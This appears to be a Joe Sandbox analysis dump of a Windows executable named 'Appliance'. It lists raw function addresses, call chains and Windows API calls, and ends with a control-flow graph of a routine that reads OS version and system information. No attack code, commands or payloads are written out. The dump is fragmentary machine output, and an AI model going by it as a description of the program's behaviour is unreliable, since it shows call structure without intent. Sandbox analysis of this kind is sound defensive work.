LeaveCriticalSection __wsopen_s 98565->98573 98568->98556 98569->98550 98570->98564 98571->98563 98572->98565 98573->98564 98574->98552 98575->98557 98576->98564 98577 e15650 98586 dde3d5 98577->98586 98579 e15666 98581 e156e1 98579->98581 98595 ddaa65 9 API calls 98579->98595 98584 e161d7 98581->98584 98597 e33fe1 81 API calls __wsopen_s 98581->98597 98582 e156c1 98582->98581 98596 e3247e 8 API calls 98582->98596 98587 dde3f6 98586->98587 98588 dde3e3 98586->98588 98589 dde429 98587->98589 98590 dde3fb 98587->98590 98598 dcb4c8 8 API calls 98588->98598 98599 dcb4c8 8 API calls 98589->98599 98592 de014b 8 API calls 98590->98592 98594 dde3ed 98592->98594 98594->98579 98595->98582 98596->98581 98597->98584 98598->98594 98599->98594 98600 de076b 98601 de0777 BuildCatchObjectHelperInternal 98600->98601 98630 de0221 98601->98630 98603 de077e 98604 de08d1 98603->98604 98607 de07a8 98603->98607 98668 de0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98604->98668 98606 de08d8 98669 de51c2 28 API calls _abort 98606->98669 98619 de07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98607->98619 98641 df27ed 98607->98641 98609 de08de 98670 de5174 28 API calls _abort 98609->98670 98613 de08e6 98614 de07c7 98616 de0848 98649 de0cc9 98616->98649 98618 de084e 98653 dc331b 98618->98653 98619->98616 98664 de518a 38 API calls 2 library calls 98619->98664 98624 de086a 98624->98606 98626 de086e 98624->98626 98625 de0877 98667 de03b0 13 API calls 2 library calls 98625->98667 98626->98625 98666 de5165 28 API calls _abort 98626->98666 98629 de087f 98629->98614 98631 de022a 98630->98631 98671 de0a08 IsProcessorFeaturePresent 98631->98671 98633 de0236 98672 de3004 10 API calls 3 library calls 98633->98672 98635 de023b 98636 de023f 98635->98636 98673 df2687 98635->98673 98636->98603 98639 de0256 98639->98603 98644 df2804 98641->98644 98642 de0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98643 de07c1 98642->98643 98643->98614 98645 df2791 98643->98645 98644->98642 98648 df27c0 98645->98648 98646 de0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98647 df27e9 98646->98647 98647->98619 98648->98646 98741 de26b0 98649->98741 98652 de0cef 98652->98618 98654 dc3382 98653->98654 98655 dc3327 IsThemeActive 98653->98655 98665 de0d02 GetModuleHandleW 98654->98665 98743 de52b3 98655->98743 98657 dc3352 98749 de5319 98657->98749 98659 dc3359 98756 dc32e6 SystemParametersInfoW SystemParametersInfoW 98659->98756 98661 dc3360 98757 dc338b 98661->98757 98663 dc3368 SystemParametersInfoW 98663->98654 98664->98616 98665->98624 98666->98625 98667->98629 98668->98606 98669->98609 98670->98613 98671->98633 98672->98635 98677 dfd576 98673->98677 98676 de302d 8 API calls 3 library calls 98676->98636 98680 dfd58f 98677->98680 98681 dfd593 98677->98681 98679 de0248 98679->98639 98679->98676 98695 de0dfc 98680->98695 98681->98680 98683 df4f6e 98681->98683 98684 df4f7a BuildCatchObjectHelperInternal 98683->98684 98702 df32d1 EnterCriticalSection 98684->98702 98686 df4f81 98703 df5422 98686->98703 98688 df4f90 98689 df4f9f 98688->98689 98716 df4e02 29 API calls 98688->98716 98718 df4fbb LeaveCriticalSection _abort 98689->98718 98692 df4f9a 98717 df4eb8 GetStdHandle GetFileType 98692->98717 98693 df4fb0 __fread_nolock 98693->98681 98696 de0e07 IsProcessorFeaturePresent 98695->98696 98697 de0e05 98695->98697 98699 de0fce 98696->98699 98697->98679 98740 de0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98699->98740 98701 de10b1 98701->98679 98702->98686 98704 df542e BuildCatchObjectHelperInternal 98703->98704 98705 df543b 98704->98705 98706 df5452 98704->98706 98727 def649 20 API calls _abort 98705->98727 98719 df32d1 EnterCriticalSection 98706->98719 98709 df5440 98728 df2b5c 26 API calls _abort 98709->98728 98711 df548a 98729 df54b1 LeaveCriticalSection _abort 98711->98729 98712 df544a __fread_nolock 98712->98688 98713 df545e 98713->98711 98720 df5373 98713->98720 98716->98692 98717->98689 98718->98693 98719->98713 98730 df4ff0 98720->98730 98722 df5392 98724 df2d38 _free 20 API calls 98722->98724 98723 df5385 98723->98722 98737 df3778 11 API calls 2 library calls 98723->98737 98726 df53e4 98724->98726 98726->98713 98727->98709 98728->98712 98729->98712 98735 df4ffd _abort 98730->98735 98731 df503d 98739 def649 20 API calls _abort 98731->98739 98732 df5028 RtlAllocateHeap 98733 df503b 98732->98733 98732->98735 98733->98723 98735->98731 98735->98732 98738 de521d 7 API calls 2 library calls 98735->98738 98737->98723 98738->98735 98739->98733 98740->98701 98742 de0cdc GetStartupInfoW 98741->98742 98742->98652 98744 de52bf BuildCatchObjectHelperInternal 98743->98744 98806 df32d1 EnterCriticalSection 98744->98806 98746 de52ca pre_c_initialization 98807 de530a 98746->98807 98748 de52ff __fread_nolock 98748->98657 98750 de533f 98749->98750 98751 de5325 98749->98751 98750->98659 98751->98750 98811 def649 20 API calls _abort 98751->98811 98753 de532f 98812 df2b5c 26 API calls _abort 98753->98812 98755 de533a 98755->98659 98756->98661 98758 dc339b __wsopen_s 98757->98758 98759 dcbf73 8 API calls 98758->98759 98760 dc33a7 GetCurrentDirectoryW 98759->98760 98813 dc4fd9 98760->98813 98762 dc33ce IsDebuggerPresent 98763 dc33dc 98762->98763 98764 e03ca3 MessageBoxA 98762->98764 98765 e03cbb 98763->98765 98766 dc33f0 98763->98766 98764->98765 98917 dc4176 8 API calls 98765->98917 98881 dc3a95 98766->98881 98774 dc3462 98775 e03cec SetCurrentDirectoryW 98774->98775 98776 dc346a 98774->98776 98775->98776 98777 dc3475 98776->98777 98918 e21fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 98776->98918 98913 dc34d3 7 API calls 98777->98913 98780 e03d07 98780->98777 98783 e03d19 98780->98783 98785 dc5594 10 API calls 98783->98785 98784 dc347f 98787 dc396b 60 API calls 98784->98787 98791 dc3494 98784->98791 98786 e03d22 98785->98786 98788 dcb329 8 API calls 98786->98788 98787->98791 98789 e03d30 98788->98789 98792 e03d38 98789->98792 98793 e03d5f 98789->98793 98790 dc34af 98795 dc34b6 SetCurrentDirectoryW 98790->98795 98791->98790 98794 dc3907 Shell_NotifyIconW 98791->98794 98797 dc6b7c 8 API calls 98792->98797 98796 dc6b7c 8 API calls 98793->98796 98794->98790 98798 dc34ca 98795->98798 98799 e03d5b GetForegroundWindow ShellExecuteW 98796->98799 98800 e03d43 98797->98800 98798->98663 98803 e03d90 98799->98803 98802 dc7bb5 8 API calls 98800->98802 98804 e03d51 98802->98804 98803->98790 98805 dc6b7c 8 API calls 98804->98805 98805->98799 98806->98746 98810 df3319 LeaveCriticalSection 98807->98810 98809 de5311 98809->98748 98810->98809 98811->98753 98812->98755 98814 dcbf73 8 API calls 98813->98814 98815 dc4fef 98814->98815 98919 dc63d7 98815->98919 98817 dc500d 98818 dcbd57 8 API calls 98817->98818 98819 dc5021 98818->98819 98820 dcbed9 8 API calls 98819->98820 98821 dc502c 98820->98821 98822 dc893c 8 API calls 98821->98822 98823 dc5038 98822->98823 98824 dcb329 8 API calls 98823->98824 98825 dc5045 98824->98825 98826 dcbe2d 39 API calls 98825->98826 98827 dc5055 98826->98827 98828 dcb329 8 API calls 98827->98828 98829 dc507b 98828->98829 98830 dcbe2d 39 API calls 98829->98830 98831 dc508a 98830->98831 98832 dcbf73 8 API calls 98831->98832 98833 dc50a8 98832->98833 98933 dc51ca 98833->98933 98836 de4d98 _strftime 40 API calls 98837 dc50c2 98836->98837 98838 dc50cc 98837->98838 98839 e04b23 98837->98839 98840 de4d98 _strftime 40 API calls 98838->98840 98841 dc51ca 8 API calls 98839->98841 98843 dc50d7 98840->98843 98842 e04b37 98841->98842 98845 dc51ca 8 API calls 98842->98845 98843->98842 98844 dc50e1 98843->98844 98846 de4d98 _strftime 40 API calls 98844->98846 98847 e04b53 98845->98847 98848 dc50ec 98846->98848 98850 dc5594 10 API calls 98847->98850 98848->98847 98849 dc50f6 98848->98849 98851 de4d98 _strftime 40 API calls 98849->98851 98852 e04b76 98850->98852 98853 dc5101 98851->98853 98854 dc51ca 8 API calls 98852->98854 98855 e04b9f 98853->98855 98856 dc510b 98853->98856 98859 e04b82 98854->98859 98858 dc51ca 8 API calls 98855->98858 98857 dc512e 98856->98857 98860 dcbed9 8 API calls 98856->98860 98862 e04bda 98857->98862 98866 dc7e12 8 API calls 98857->98866 98861 e04bbd 98858->98861 98863 dcbed9 8 API calls 98859->98863 98864 dc5121 98860->98864 98865 dcbed9 8 API calls 98861->98865 98867 e04b90 98863->98867 98868 dc51ca 8 API calls 98864->98868 98869 e04bcb 98865->98869 98870 dc513e 98866->98870 98871 dc51ca 8 API calls 98867->98871 98868->98857 98872 dc51ca 8 API calls 98869->98872 98873 dc8470 8 API calls 98870->98873 98871->98855 98872->98862 98874 dc514c 98873->98874 98875 dc8a60 8 API calls 98874->98875 98878 dc5167 98875->98878 98876 dc893c 8 API calls 98876->98878 98877 dc8a60 8 API calls 98877->98878 98878->98876 98878->98877 98879 dc51ab 98878->98879 98880 dc51ca 8 API calls 98878->98880 98879->98762 98880->98878 98882 dc3aa2 __wsopen_s 98881->98882 98883 dc3abb 98882->98883 98884 e040da ___scrt_fastfail 98882->98884 98885 dc5851 9 API calls 98883->98885 98886 e040f6 GetOpenFileNameW 98884->98886 98887 dc3ac4 98885->98887 98888 e04145 98886->98888 98939 dc3a57 98887->98939 98891 dc8577 8 API calls 98888->98891 98893 e0415a 98891->98893 98893->98893 98894 dc3ad9 98957 dc62d5 98894->98957 99502 dc3624 7 API calls 98913->99502 98915 dc347a 98916 dc35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98915->98916 98916->98784 98917->98774 98918->98780 98920 dc63e4 __wsopen_s 98919->98920 98921 dc8577 8 API calls 98920->98921 98922 dc6416 98920->98922 98921->98922 98923 dc655e 8 API calls 98922->98923 98932 dc644c 98922->98932 98923->98922 98924 dcb329 8 API calls 98925 dc6543 98924->98925 98928 dc6a7c 8 API calls 98925->98928 98926 dcb329 8 API calls 98926->98932 98927 dc655e 8 API calls 98927->98932 98929 dc654f 98928->98929 98929->98817 98930 dc6a7c 8 API calls 98930->98932 98931 dc651a 98931->98924 98931->98929 98932->98926 98932->98927 98932->98930 98932->98931 98934 dc51d4 98933->98934 98935 dc51f2 98933->98935 98937 dc50b4 98934->98937 98938 dcbed9 8 API calls 98934->98938 98936 dc8577 8 API calls 98935->98936 98936->98937 98937->98836 98938->98937 98940 e022d0 __wsopen_s 98939->98940 98941 dc3a64 GetLongPathNameW 98940->98941 98942 dc8577 8 API calls 98941->98942 98943 dc3a8c 98942->98943 98944 dc53f2 98943->98944 98945 dcbf73 8 API calls 98944->98945 98946 dc5404 98945->98946 98947 dc5851 9 API calls 98946->98947 98948 dc540f 98947->98948 98949 dc541a 98948->98949 98950 e04d5b 98948->98950 98952 dc6a7c 8 API calls 98949->98952 98955 e04d7d 98950->98955 98993 dde36b 41 API calls 98950->98993 98953 dc5426 98952->98953 98987 dc1340 98953->98987 98956 dc5439 98956->98894 98994 dc6679 98957->98994 98960 e05336 99119 e336b8 98960->99119 98961 dc6679 93 API calls 98963 dc630e 98961->98963 98963->98960 98965 dc6316 98963->98965 98969 e05353 98965->98969 98970 dc6322 98965->98970 98988 dc1352 98987->98988 98992 dc1371 __fread_nolock 98987->98992 98991 de017b 8 API calls 98988->98991 98989 de014b 8 API calls 98990 dc1388 98989->98990 98990->98956 98991->98992 98992->98989 98993->98950 99173 dc663e LoadLibraryA 98994->99173 98999 e05648 99002 dc66e7 68 API calls 98999->99002 99000 dc66a4 LoadLibraryExW 99181 dc6607 LoadLibraryA 99000->99181 99003 e0564f 99002->99003 99005 dc6607 3 API calls 99003->99005 99007 e05657 99005->99007 99202 dc684a 99007->99202 99008 dc66ce 99008->99007 99009 dc66da 99008->99009 99011 dc66e7 68 API calls 99009->99011 99013 dc62fa 99011->99013 99013->98960 99013->98961 99120 e336d4 99119->99120 99121 dc6874 64 API calls 99120->99121 99174 dc6674 99173->99174 99175 dc6656 GetProcAddress 99173->99175 99178 dee95b 99174->99178 99176 dc6666 99175->99176 99176->99174 99177 dc666d FreeLibrary 99176->99177 99177->99174 99210 dee89a 99178->99210 99180 dc6698 99180->98999 99180->99000 99182 dc661c GetProcAddress 99181->99182 99183 dc663b 99181->99183 99184 dc662c 99182->99184 99186 dc6720 99183->99186 99184->99183 99185 dc6634 FreeLibrary 99184->99185 99185->99183 99187 de017b 8 API calls 99186->99187 99188 dc6735 99187->99188 99189 dc423c 8 API calls 99188->99189 99191 dc6741 __fread_nolock 99189->99191 99190 e056c2 99268 e33a92 74 API calls 99190->99268 99191->99190 99195 dc677c 99191->99195 99267 e33a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99191->99267 99194 dc684a 40 API calls 99194->99195 99195->99194 99196 e05706 99195->99196 99198 dc6874 64 API calls 99195->99198 99201 dc6810 ISource 99195->99201 99262 dc6874 99196->99262 99198->99195 99201->99008 99203 e05760 99202->99203 99204 dc685c 99202->99204 99300 deec34 99204->99300 99207 e332bd 99337 e3310d 99207->99337 99213 dee8a6 BuildCatchObjectHelperInternal 99210->99213 99211 dee8b4 99235 def649 20 API calls _abort 99211->99235 99213->99211 99215 dee8e4 99213->99215 99214 dee8b9 99236 df2b5c 26 API calls _abort 99214->99236 99217 dee8e9 99215->99217 99218 dee8f6 99215->99218 99237 def649 20 API calls _abort 99217->99237 99227 df83e1 99218->99227 99221 dee8c4 __fread_nolock 99221->99180 99222 dee8ff 99223 dee905 99222->99223 99225 dee912 99222->99225 99238 def649 20 API calls _abort 99223->99238 99239 dee944 LeaveCriticalSection __fread_nolock 99225->99239 99228 df83ed BuildCatchObjectHelperInternal 99227->99228 99240 df32d1 EnterCriticalSection 99228->99240 99230 df83fb 99241 df847b 99230->99241 99234 df842c __fread_nolock 99234->99222 99235->99214 99236->99221 99237->99221 99238->99221 99239->99221 99240->99230 99247 df849e 99241->99247 99242 df84f7 99243 df4ff0 _abort 20 API calls 99242->99243 99244 df8500 99243->99244 99246 df2d38 _free 20 API calls 99244->99246 99248 df8509 99246->99248 99247->99242 99247->99247 99253 df8408 99247->99253 99257 de94fd EnterCriticalSection 99247->99257 99258 de9511 LeaveCriticalSection 99247->99258 99248->99253 99259 df3778 11 API calls 2 library calls 99248->99259 99250 df8528 99260 de94fd EnterCriticalSection 99250->99260 99254 df8437 99253->99254 99261 df3319 LeaveCriticalSection 99254->99261 99256 df843e 99256->99234 99257->99247 99258->99247 99259->99250 99260->99253 99261->99256 99263 e05780 99262->99263 99264 dc6883 99262->99264 99269 def053 99264->99269 99267->99190 99268->99195 99272 deee1a 99269->99272 99274 deee26 BuildCatchObjectHelperInternal 99272->99274 99273 deee32 99297 def649 20 API calls _abort 99273->99297 99274->99273 99275 deee58 99274->99275 99285 de94fd EnterCriticalSection 99275->99285 99278 deee37 99297->99278 99303 deec51 99300->99303 99302 dc686d 99302->99207 99304 deec5d BuildCatchObjectHelperInternal 99303->99304 99305 deec9d 99304->99305 99306 deec70 ___scrt_fastfail 99304->99306 99315 deec95 __fread_nolock 99304->99315 99316 de94fd EnterCriticalSection 99305->99316 99330 def649 20 API calls _abort 99306->99330 99308 deeca7 99317 deea68 99308->99317 99311 deec8a 99331 df2b5c 26 API calls _abort 99311->99331 99315->99302 99316->99308 99321 deea7a ___scrt_fastfail 99317->99321 99323 deea97 99317->99323 99318 deea87 99333 def649 20 API calls _abort 99318->99333 99321->99318 99321->99323 99325 deeada __fread_nolock 99321->99325 99332 deecdc LeaveCriticalSection __fread_nolock 99323->99332 99324 deebf6 ___scrt_fastfail 99325->99323 99325->99324 99327 dedcc5 __fread_nolock 26 API calls 99325->99327 99329 df90c5 __fread_nolock 38 API calls 99325->99329 99335 ded2e8 26 API calls 4 library calls 99325->99335 99327->99325 99329->99325 99330->99311 99331->99315 99332->99315 99335->99325 99340 dee858 99337->99340 99343 dee7d9 99340->99343 99344 dee7e8 99343->99344 99346 dee7fc 99343->99346 99351 def649 20 API calls _abort 99344->99351 99350 dee7f8 __alldvrm 99346->99350 99353 df36b2 11 API calls 2 library calls 99346->99353 99353->99350 99502->98915 99503 dc1044 99508 dc2793 99503->99508 99505 dc104a 99544 de0413 29 API calls __onexit 99505->99544 99507 dc1054 99545 dc2a38 99508->99545 99512 dc280a 99513 dcbf73 8 API calls 99512->99513 99514 dc2814 99513->99514 99515 dcbf73 8 API calls 99514->99515 99516 dc281e 99515->99516 99517 dcbf73 8 API calls 99516->99517 99518 dc2828 99517->99518 99519 dcbf73 8 API calls 99518->99519 99520 dc2866 99519->99520 99521 dcbf73 8 API calls 99520->99521 99522 dc2932 99521->99522 99555 dc2dbc 99522->99555 99526 dc2964 99527 dcbf73 8 API calls 99526->99527 99528 dc296e 99527->99528 99529 dd3160 9 API calls 99528->99529 99530 dc2999 99529->99530 99582 dc3166 99530->99582 99532 dc29b5 99533 dc29c5 GetStdHandle 99532->99533 99534 dc2a1a 99533->99534 99535 e039e7 99533->99535 99538 dc2a27 OleInitialize 99534->99538 99535->99534 99536 e039f0 99535->99536 99537 de014b 8 API calls 99536->99537 99539 e039f7 99537->99539 99538->99505 99589 e30ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99539->99589 99541 e03a00 99590 e312eb CreateThread 99541->99590 99543 e03a0c CloseHandle 99543->99534 99544->99507 99591 dc2a91 99545->99591 99548 dc2a91 8 API calls 99549 dc2a70 99548->99549 99550 dcbf73 8 API calls 99549->99550 99551 dc2a7c 99550->99551 99552 dc8577 8 API calls 99551->99552 99553 dc27c9 99552->99553 99554 dc327e 6 API calls 99553->99554 99554->99512 99556 dcbf73 8 API calls 99555->99556 99557 dc2dcc 99556->99557 99558 dcbf73 8 API calls 99557->99558 99559 dc2dd4 99558->99559 99598 dc81d6 99559->99598 99562 dc81d6 8 API calls 99563 dc2de4 99562->99563 99564 dcbf73 8 API calls 99563->99564 99565 dc2def 99564->99565 99566 de014b 8 API calls 99565->99566 99567 dc293c 99566->99567 99568 dc3205 99567->99568 99569 dc3213 99568->99569 99570 dcbf73 8 API calls 99569->99570 99571 dc321e 99570->99571 99572 dcbf73 8 API calls 99571->99572 99573 dc3229 99572->99573 99574 dcbf73 8 API calls 99573->99574 99575 dc3234 99574->99575 99576 dcbf73 8 API calls 99575->99576 99577 dc323f 99576->99577 99578 dc81d6 8 API calls 99577->99578 99579 dc324a 99578->99579 99580 de014b 8 API calls 99579->99580 99581 dc3251 RegisterWindowMessageW 99580->99581 99581->99526 99583 dc3176 99582->99583 99584 e03c8f 99582->99584 99585 de014b 8 API calls 99583->99585 99601 e33c4e 8 API calls 99584->99601 99587 dc317e 99585->99587 99587->99532 99588 e03c9a 99589->99541 99590->99543 99602 e312d1 14 API calls 99590->99602 99592 dcbf73 8 API calls 99591->99592 99593 dc2a9c 99592->99593 99594 dcbf73 8 API calls 99593->99594 99595 dc2aa4 99594->99595 99596 dcbf73 8 API calls 99595->99596 99597 dc2a66 99596->99597 99597->99548 99599 dcbf73 8 API calls 99598->99599 99600 dc2ddc 99599->99600 99600->99562 99601->99588 99603 dcf5e5 99604 dccab0 207 API calls 99603->99604 99605 dcf5f3 99604->99605 99606 dcf4c0 99609 dda025 99606->99609 99608 dcf4cc 99610 dda046 99609->99610 99615 dda0a3 99609->99615 99612 dd0340 207 API calls 99610->99612 99610->99615 99616 dda077 99612->99616 99613 e1806b 99613->99613 99614 dda0e7 99614->99608 99615->99614 99618 e33fe1 81 API calls __wsopen_s 99615->99618 99616->99614 99616->99615 99617 dcbed9 8 API calls 99616->99617 99617->99615 99618->99613 99619 df8782 99624 df853e 99619->99624 99622 df87aa 99629 df856f try_get_first_available_module 99624->99629 99626 df876e 99643 df2b5c 26 API calls _abort 99626->99643 99628 df86c3 99628->99622 99636 e00d04 99628->99636 99629->99629 99635 df86b8 99629->99635 99639 de917b 40 API calls 2 library calls 99629->99639 99631 df870c 99631->99635 99640 de917b 40 API calls 2 library calls 99631->99640 99633 df872b 99633->99635 99641 de917b 40 API calls 2 library calls 99633->99641 99635->99628 99642 def649 20 API calls _abort 99635->99642 99644 e00401 99636->99644 99638 e00d1f 99638->99622 99639->99631 99640->99633 99641->99635 99642->99626 99643->99628 99647 e0040d BuildCatchObjectHelperInternal 99644->99647 99645 e0041b 99702 def649 20 API calls _abort 99645->99702 99647->99645 99649 e00454 99647->99649 99648 e00420 99703 df2b5c 26 API calls _abort 99648->99703 99655 e009db 99649->99655 99654 e0042a __fread_nolock 99654->99638 99705 e007af 99655->99705 99658 e00a26 99723 df5594 99658->99723 99659 e00a0d 99737 def636 20 API calls _abort 99659->99737 99662 e00a2b 99664 e00a34 99662->99664 99665 e00a4b 99662->99665 99663 e00a12 99738 def649 20 API calls _abort 99663->99738 99739 def636 20 API calls _abort 99664->99739 99736 e0071a CreateFileW 99665->99736 99669 e00a39 99740 def649 20 API calls _abort 99669->99740 99671 e00b01 GetFileType 99672 e00b53 99671->99672 99673 e00b0c GetLastError 99671->99673 99745 df54dd 21 API calls 2 library calls 99672->99745 99743 def613 20 API calls __dosmaperr 99673->99743 99674 e00ad6 GetLastError 99742 def613 20 API calls __dosmaperr 99674->99742 99677 e00a84 99677->99671 99677->99674 99741 e0071a CreateFileW 99677->99741 99679 e00b1a CloseHandle 99679->99663 99682 e00b43 99679->99682 99680 e00ac9 99680->99671 99680->99674 99744 def649 20 API calls _abort 99682->99744 99683 e00b74 99688 e00bc0 99683->99688 99746 e0092b 72 API calls 3 library calls 99683->99746 99685 e00b48 99685->99663 99690 e00bed 99688->99690 99747 e004cd 72 API calls 4 library calls 99688->99747 99689 e00be6 99689->99690 99691 e00bfe 99689->99691 99748 df8a2e 99690->99748 99693 e00478 99691->99693 99694 e00c7c CloseHandle 99691->99694 99704 e004a1 LeaveCriticalSection __wsopen_s 99693->99704 99763 e0071a CreateFileW 99694->99763 99696 e00ca7 99697 e00cb1 GetLastError 99696->99697 99698 e00cdd 99696->99698 99764 def613 20 API calls __dosmaperr 99697->99764 99698->99693 99700 e00cbd 99765 df56a6 21 API calls 2 library calls 99700->99765 99702->99648 99703->99654 99704->99654 99706 e007d0 99705->99706 99707 e007ea 99705->99707 99706->99707 99773 def649 20 API calls _abort 99706->99773 99766 e0073f 99707->99766 99710 e007df 99774 df2b5c 26 API calls _abort 99710->99774 99712 e00851 99721 e008a4 99712->99721 99777 deda7d 26 API calls 2 library calls 99712->99777 99713 e00822 99713->99712 99775 def649 20 API calls _abort 99713->99775 99716 e00846 99776 df2b5c 26 API calls _abort 99716->99776 99717 e0089f 99718 e0091e 99717->99718 99717->99721 99778 df2b6c 11 API calls _abort 99718->99778 99721->99658 99721->99659 99722 e0092a 99724 df55a0 BuildCatchObjectHelperInternal 99723->99724 99781 df32d1 EnterCriticalSection 99724->99781 99726 df55a7 99728 df55cc 99726->99728 99732 df563a EnterCriticalSection 99726->99732 99734 df55ee 99726->99734 99729 df5373 __wsopen_s 21 API calls 99728->99729 99730 df55d1 99729->99730 99730->99734 99785 df54ba EnterCriticalSection 99730->99785 99731 df5617 __fread_nolock 99731->99662 99732->99734 99735 df5647 LeaveCriticalSection 99732->99735 99782 df569d 99734->99782 99735->99726 99736->99677 99737->99663 99738->99693 99739->99669 99740->99663 99741->99680 99742->99663 99743->99679 99744->99685 99745->99683 99746->99688 99747->99689 99749 df5737 __wsopen_s 26 API calls 99748->99749 99750 df8a3e 99749->99750 99751 df8a44 99750->99751 99753 df8a76 99750->99753 99756 df5737 __wsopen_s 26 API calls 99750->99756 99787 df56a6 21 API calls 2 library calls 99751->99787 99753->99751 99754 df5737 __wsopen_s 26 API calls 99753->99754 99758 df8a82 CloseHandle 99754->99758 99755 df8a9c 99759 df8abe 99755->99759 99788 def613 20 API calls __dosmaperr 99755->99788 99757 df8a6d 99756->99757 99760 df5737 __wsopen_s 26 API calls 99757->99760 99758->99751 99761 df8a8e GetLastError 99758->99761 99759->99693 99760->99753 99761->99751 99763->99696 99764->99700 99765->99698 99767 e00757 99766->99767 99768 e00772 99767->99768 99779 def649 20 API calls _abort 99767->99779 99768->99713 99770 e00796 99780 df2b5c 26 API calls _abort 99770->99780 99772 e007a1 99772->99713 99773->99710 99774->99707 99775->99716 99776->99712 99777->99717 99778->99722 99779->99770 99780->99772 99781->99726 99786 df3319 LeaveCriticalSection 99782->99786 99784 df56a4 99784->99731 99785->99734 99786->99784 99787->99755 99788->99759

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 224 dc5fc8-dc6037 call dcbf73 GetVersionExW call dc8577 229 dc603d 224->229 230 e0507d-e05090 224->230 232 dc603f-dc6041 229->232 231 e05091-e05095 230->231 235 e05097 231->235 236 e05098-e050a4 231->236 233 dc6047-dc60a6 call dcadf4 call dc55dc 232->233 234 e050bc 232->234 248 dc60ac-dc60ae 233->248 249 e05224-e0522b 233->249 239 e050c3-e050cf 234->239 235->236 236->231 238 e050a6-e050a8 236->238 238->232 241 e050ae-e050b5 238->241 242 dc611c-dc6136 GetCurrentProcess IsWow64Process 239->242 241->230 244 e050b7 241->244 246 dc6138 242->246 247 dc6195-dc619b 242->247 244->234 250 dc613e-dc614a 246->250 247->250 251 e05125-e05138 248->251 252 dc60b4-dc60b7 248->252 253 e0524b-e0524e 249->253 254 e0522d 249->254 255 e05269-e0526d GetSystemInfo 250->255 256 dc6150-dc615f LoadLibraryA 250->256 257 e05161-e05163 251->257 258 e0513a-e05143 251->258 252->242 259 dc60b9-dc60f5 252->259 261 e05250-e0525f 253->261 262 e05239-e05241 253->262 260 e05233 254->260 263 dc619d-dc61a7 GetSystemInfo 256->263 264 dc6161-dc616f GetProcAddress 256->264 270 e05165-e0517a 257->270 271 e05198-e0519b 257->271 267 e05150-e0515c 258->267 268 e05145-e0514b 258->268 259->242 269 dc60f7-dc60fa 259->269 260->262 261->260 272 e05261-e05267 261->272 262->253 266 dc6177-dc6179 263->266 264->263 265 dc6171-dc6175 GetNativeSystemInfo 264->265 265->266 273 dc617b-dc617c FreeLibrary 266->273 274 dc6182-dc6194 266->274 267->242 268->242 275 e050d4-e050e4 269->275 276 dc6100-dc610a 269->276 277 e05187-e05193 270->277 278 e0517c-e05182 270->278 279 e051d6-e051d9 271->279 280 e0519d-e051b8 271->280 272->262 273->274 283 e050e6-e050f2 275->283 284 e050f7-e05101 275->284 276->239 286 dc6110-dc6116 276->286 277->242 278->242 279->242 285 e051df-e05206 279->285 281 e051c5-e051d1 280->281 282 e051ba-e051c0 280->282 281->242 282->242 283->242 287 e05103-e0510f 284->287 288 e05114-e05120 284->288 289 e05213-e0521f 285->289 290 e05208-e0520e 285->290 286->242 287->242 288->242 289->242 290->242
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00DC5FF7
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00E5DC2C,00000000,?,?), ref: 00DC6123
                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00DC612A
                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DC6155
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DC6167
                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00DC6175
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DC617C
                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00DC61A1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                            • Opcode ID: bb033e74274e93dc63731c52b7a7137a6277065f7ad0a15af69da0d2f65fb842
                                                                                                                                            • Instruction ID: e7a03bcab44ff5ef76cc6002649744550264baeec0a238681dbab660abae6287
                                                                                                                                            • Opcode Fuzzy Hash: bb033e74274e93dc63731c52b7a7137a6277065f7ad0a15af69da0d2f65fb842
                                                                                                                                            • Instruction Fuzzy Hash: ADA1863280A7C7FFCF15CB6A7C416A57F546B26305B0858AFD681B7262C269854CCF71

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
